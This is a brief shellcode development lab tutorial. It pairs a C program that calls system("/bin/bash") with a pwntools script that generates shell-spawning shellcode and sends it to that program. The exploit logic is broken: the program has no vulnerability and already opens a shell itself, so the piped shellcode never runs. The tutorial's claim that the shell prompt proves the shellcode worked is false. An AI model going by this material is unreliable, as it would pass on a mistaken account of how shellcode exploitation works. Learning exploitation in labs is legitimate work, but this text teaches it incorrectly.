Shellcode Development Lab

Shellcode Development Lab

In this lab, we will learn how to write and execute custom shellcode for basic commands.

Lab Activities:

1. Writing Custom Shellcode:

To begin, let's create a simple C program that executes a basic shell command.

  #include <stdio.h>
  #include <stdlib.h>

  int main() {
      system("/bin/bash");
      return 0;
  }
  

Save the above code to a file named shell.c and compile it:

$ gcc -o shell shell.c

Now, let's write an exploit script in Python using pwntools to execute our custom shellcode:

  from pwn import *

  # Craft the shellcode
  shellcode = asm(shellcraft.sh())

  # Create a payload with the shellcode
  payload = shellcode

  # Launch the exploit
  p = process('./shell')
  p.sendline(payload)
  p.interactive()
  

Explanation of the Python script:

• We use asm(shellcraft.sh()) to generate the shellcode for spawning a shell.
• The shellcode is then used as the payload.
• We launch the shell binary and send the payload to execute the shellcode.
• p.interactive() allows us to interact with the spawned shell.

2. Executing Custom Shellcode:

Execute the Python script and observe the shell is spawned:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful execution of the custom shellcode.